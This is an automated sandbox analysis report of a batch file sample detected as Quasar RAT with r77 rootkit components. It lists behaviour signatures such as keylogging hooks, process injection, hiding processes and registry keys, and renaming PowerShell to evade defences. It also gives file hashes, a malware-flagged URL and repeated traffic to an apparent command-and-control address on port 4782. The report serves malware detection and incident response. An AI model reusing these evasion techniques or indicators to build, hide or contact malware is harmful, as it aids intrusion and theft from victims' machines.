Windows Analysis Report
Uni.bat

Overview

General Information

Sample Name: Uni.bat
Analysis ID: 764821
MD5: e5e15a02b05c3380f4fa7197c8738a1c
SHA1: 3b023bd25f9ddaead8acff1fca1cde6877058f9c
SHA256: 42fd8ec2c10110f12d549959b3d96dfe7545b570a9027e552bfc2485a72630d1
Infos:

Detection

Quasar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Yara detected Quasar RAT
Installs a global keyboard hook
Hooks registry keys query functions (used to hide registry keys)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Renames powershell.exe to bypass HIPS
Hooks processes query functions (used to hide processes)
Modifies the prolog of user mode functions (user mode inline hooks)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Obfuscated command line found
Deletes itself after installation
Modifies the context of a thread in another process (thread injection)
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hooks files or directories query functions (used to hide files and directories)
Drops executables to the windows directory (C:\Windows) and starts them
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates COM task schedule object (often to register a task for autostart)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.pngh Avira URL Cloud: Label: malware
Source: http://pesterbdd.com/images/Pester.png Avira URL Cloud: Label: malware
Source: http://pesterbdd.com/images/Pester.pngXz Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: http://pesterbdd.com/images/Pester.png Virustotal: Detection: 8% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Windows\$sxr-seroxen\$sxr-nircmd.exe ReversingLabs: Detection: 16%
Yara detected Quasar RAT
Source: Yara match File source: 00000003.00000002.2429957465.0000019D0022C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Uni.bat.exe PID: 5268, type: MEMORYSTR
Source: Binary string: D:\a\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140d.amd64.pdb source: vcruntime140d.dll.10.dr
Source: Binary string: C:\Users\C5\Documents\r77-rootkit-master\r77-rootkit-master\vs\x64\Debug\Uninstall64.pdb source: Uni.bat.exe, 00000003.00000002.2634186452.0000019D129EF000.00000004.00000800.00020000.00000000.sdmp, Uni.bat.exe, 00000003.00000002.2496136808.0000019D10506000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000000.2365436341.000000014013F000.00000040.00000001.00020000.00000000.sdmp, dllhost.exe, 00000005.00000000.2369515088.000000014013F000.00000040.00000001.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.2391214363.000000014013F000.00000040.00000001.00020000.00000000.sdmp, $sxr-seroxen.bat.exe, 0000000A.00000003.3073672639.000001B3B2094000.00000004.00000800.00020000.00000000.sdmp, $sxr-seroxen.bat.exe, 0000000A.00000003.3080757815.000001B3B21B2000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.2809577055.000000014013F000.00000040.00000001.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000000.2792652478.000000014013F000.00000040.00000001.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000000.2777688385.000000014013F000.00000040.00000001.00020000.00000000.sdmp
Source: Binary string: C:\Users\C5\Documents\InstallStager\obj\Debug\InstallStager.pdb source: Uni.bat.exe, 00000003.00000002.2497057533.0000019D10546000.00000004.00000800.00020000.00000000.sdmp, $sxr-seroxen.bat.exe, 0000000A.00000003.3075008245.000001B3B20CA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\C5\Documents\r77-rootkit-master\r77-rootkit-master\vs\x64\Debug\InstallService64.pdb source: dllhost.exe, 0000000C.00000000.3122152599.000000014013F000.00000040.00000001.00020000.00000000.sdmp, dllhost.exe, 0000000C.00000000.3118963870.000000014013F000.00000040.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\TCDE700.tmp.pdb source: svchost.exe, 00000017.00000000.3951826467.0000014BE946B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.3968526894.0000014BE946B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140_1d.amd64.pdb source: vcruntime140_1d.dll.10.dr
Source: Binary string: costura.costura.pdb.compressed source: Uni.bat.exe, 00000003.00000002.2429957465.0000019D0022C000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000017.00000000.3951826467.0000014BE946B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.3968526894.0000014BE946B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140_1d.amd64.pdb""" source: vcruntime140_1d.dll.10.dr
Source: Binary string: powershell.pdbUGP source: Uni.bat.exe, 00000003.00000000.2252313642.00007FF640F2A000.00000002.00000001.01000000.00000003.sdmp, $sxr-seroxen.bat.exe.6.dr, Uni.bat.exe.0.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\47114209A62F3B9930F6B8998DFD4A991 source: svchost.exe, 00000017.00000000.3951094596.0000014BE9446000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.3967824624.0000014BE9446000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ucrtbased.pdbGCTL source: ucrtbased.dll.10.dr
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net452\Microsoft.Win32.TaskScheduler.pdb source: $sxr-seroxen.bat.exe, 0000000A.00000003.3082027574.000001B3B21E8000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\47114209A62F3B9930F6B8998DFD4A991K source: svchost.exe, 00000017.00000000.3951094596.0000014BE9446000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.3967824624.0000014BE9446000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ucrtbased.pdb source: ucrtbased.dll.10.dr
Source: Binary string: powershell.pdb source: Uni.bat.exe, 00000003.00000000.2252313642.00007FF640F2A000.00000002.00000001.01000000.00000003.sdmp, $sxr-seroxen.bat.exe.6.dr, Uni.bat.exe.0.dr
Source: Binary string: C:\Users\C5\Documents\r77-rootkit-master\r77-rootkit-master\vs\x64\Debug\r77-x64.pdb source: dllhost.exe, 0000000C.00000000.3159101923.000000014026D000.00000040.00000001.00020000.00000000.sdmp, winlogon.exe, 0000000D.00000000.3217285324.0000023567800000.00000040.00000001.00020000.00000000.sdmp, winlogon.exe, 0000000D.00000000.3206981447.0000023565BD5000.00000040.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3281916564.000002AFF5EE5000.00000040.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3283701199.000002AFF6080000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000000.3310345436.0000020F6F7C5000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000000.3312143440.0000020F6F960000.00000040.00000001.00020000.00000000.sdmp, dwm.exe, 00000010.00000000.3495401012.00000252B9115000.00000040.00000001.00020000.00000000.sdmp, dwm.exe, 00000010.00000000.3590794816.00000252B92B0000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.3612310946.000001E5453B5000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.3624806486.000001E545A90000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000000.3661604975.000001488E185000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000000.3692429646.000001488E550000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000000.3721530561.0000021FDABC0000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000000.3719665518.0000021FDAA25000.00000040.00000001.00020000.00000000.sdmp, IntelCpHDCPSvc.exe, 00000014.00000000.3734350879.00000225E8CF5000.00000040.00000001.00020000.00000000.sdmp, IntelCpHDCPSvc.exe, 00000014.00000000.3744646048.00000225E8E90000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.3760323961.0000012E243A5000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.3771979511.0000012E24540000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.3919313900.0000027F00B50000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.3780236062.0000027F00105000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.3958785710.0000014BEA3B5000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.3975353339.0000014BEA550000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000000.3993158287.0000023FA6725000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000000.4006052296.0000023FA68C0000.00000040.00000001.00020000.00000000.sdmp, IntelCpHeciSvc.exe, 00000019.00000000.4030458116.00000148255B0000.00000040.00000001.00020000.00000000.sdmp, IntelCpHeciSvc.exe, 00000019.00000000.4028103118.0000014825415000.00000040.00000001.00020000.00000000.sdmp, igfxCUIService.exe, 0000001A.00000000.4052985855.00000252DE3D5000.00000040.00000001.00020000.00000000.sdmp, igfxCUIService.exe, 0000001A.00000000.4054962319.00000
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\36C00AF489401A26639ABBA698DE76062 source: svchost.exe, 00000017.00000000.3951094596.0000014BE9446000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.3967824624.0000014BE9446000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000017.00000000.3951826467.0000014BE946B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.3968526894.0000014BE946B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net452\Microsoft.Win32.TaskScheduler.pdbSHA256 source: $sxr-seroxen.bat.exe, 0000000A.00000003.3082027574.000001B3B21E8000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000017.00000000.3951826467.0000014BE946B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.3968526894.0000014BE946B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140d.amd64.pdb/// source: vcruntime140d.dll.10.dr
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000017.00000000.3951826467.0000014BE946B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.3968526894.0000014BE946B000.00000004.00000001.00020000.00000000.sdmp
Creates COM task schedule object (often to register a task for autostart)
Source: C:\Windows\$sxr-seroxen.bat.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32 Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32 Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32 Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32 Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_00000001400FFC90 FindFirstFileExW,FindNextFileW, 5_2_00000001400FFC90
Source: C:\Windows\System32\dllhost.exe Code function: 11_2_00000001400FFC90 FindFirstFileExW,FindNextFileW, 11_2_00000001400FFC90
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.11.20:49843 -> 185.246.220.123:4782
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.123
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.123
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.123
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.123
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.123
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.123
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.123
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.123
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.123
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.123
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.123
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.123
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.123
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.123
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.123
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.123
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.123
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.123
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.123
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.123
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.123
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.123
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.123
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.123
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.123
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.123
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.123
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.123
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.123
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.123
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.123
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.123
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.123
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.123
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.123
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.123
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.123
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.123
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.123
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.123
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.123
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.123
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.123
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.123
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.123
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.123
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.123
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.123
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.123
Source: unknown TCP traffic detected without corresponding DNS query: 185.246.220.123
Source: svchost.exe, 00000016.00000000.3908512342.0000027F00400000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://Passport.NET/tb
Source: lsass.exe, 0000000E.00000000.3273574517.000002AFF54BB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3240948457.000002AFF54BB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3229834280.000002AFF4C6C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3268056055.000002AFF4C6C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: lsass.exe, 0000000E.00000000.3273574517.000002AFF54BB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3240948457.000002AFF54BB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: lsass.exe, 0000000E.00000000.3273574517.000002AFF54BB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3277535735.000002AFF5C33000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3276936482.000002AFF5C00000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3249570666.000002AFF5C00000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3240948457.000002AFF54BB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3250771899.000002AFF5C33000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: lsass.exe, 0000000E.00000000.3273574517.000002AFF54BB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3254486063.000002AFF5CE6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3279353165.000002AFF5CE6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3242147308.000002AFF54E8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3274047175.000002AFF54E8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3240948457.000002AFF54BB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3229834280.000002AFF4C6C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3268056055.000002AFF4C6C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: lsass.exe, 0000000E.00000000.3273574517.000002AFF54BB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3230944309.000002AFF4C85000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3238773086.000002AFF546E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3272680945.000002AFF546E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3240948457.000002AFF54BB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: lsass.exe, 0000000E.00000000.3238773086.000002AFF546E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3272680945.000002AFF546E000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 00000010.00000000.3528865311.00000252B2E73000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 00000010.00000000.3345991852.00000252B2E73000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: lsass.exe, 0000000E.00000000.3238773086.000002AFF546E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3272680945.000002AFF546E000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 00000010.00000000.3528865311.00000252B2E73000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 00000010.00000000.3345991852.00000252B2E73000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: lsass.exe, 0000000E.00000000.3273574517.000002AFF54BB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3240948457.000002AFF54BB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3229834280.000002AFF4C6C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3268056055.000002AFF4C6C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: lsass.exe, 0000000E.00000000.3273574517.000002AFF54BB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3240948457.000002AFF54BB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: lsass.exe, 0000000E.00000000.3273574517.000002AFF54BB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3277535735.000002AFF5C33000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3276936482.000002AFF5C00000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3249570666.000002AFF5C00000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3240948457.000002AFF54BB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3250771899.000002AFF5C33000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: lsass.exe, 0000000E.00000000.3273574517.000002AFF54BB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3230944309.000002AFF4C85000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3238773086.000002AFF546E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3272680945.000002AFF546E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3240948457.000002AFF54BB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: lsass.exe, 0000000E.00000000.3273574517.000002AFF54BB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3254486063.000002AFF5CE6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3279353165.000002AFF5CE6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3242147308.000002AFF54E8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3274047175.000002AFF54E8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3240948457.000002AFF54BB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3229834280.000002AFF4C6C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3268056055.000002AFF4C6C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: lsass.exe, 0000000E.00000000.3273574517.000002AFF54BB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3277535735.000002AFF5C33000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3240948457.000002AFF54BB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3250771899.000002AFF5C33000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: lsass.exe, 0000000E.00000000.3273574517.000002AFF54BB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3240948457.000002AFF54BB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.co_eNs
Source: lsass.exe, 0000000E.00000000.3273574517.000002AFF54BB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3240948457.000002AFF54BB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3229834280.000002AFF4C6C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3268056055.000002AFF4C6C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: lsass.exe, 0000000E.00000000.3273574517.000002AFF54BB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3277535735.000002AFF5C33000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3276936482.000002AFF5C00000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3249570666.000002AFF5C00000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3240948457.000002AFF54BB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3250771899.000002AFF5C33000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 0000000E.00000000.3273574517.000002AFF54BB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3230944309.000002AFF4C85000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3238773086.000002AFF546E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3272680945.000002AFF546E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3240948457.000002AFF54BB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: lsass.exe, 0000000E.00000000.3273574517.000002AFF54BB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3254486063.000002AFF5CE6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3279353165.000002AFF5CE6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3242147308.000002AFF54E8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3274047175.000002AFF54E8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3240948457.000002AFF54BB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3229834280.000002AFF4C6C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3268056055.000002AFF4C6C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
Source: lsass.exe, 0000000E.00000000.3242147308.000002AFF54E8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3274047175.000002AFF54E8000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
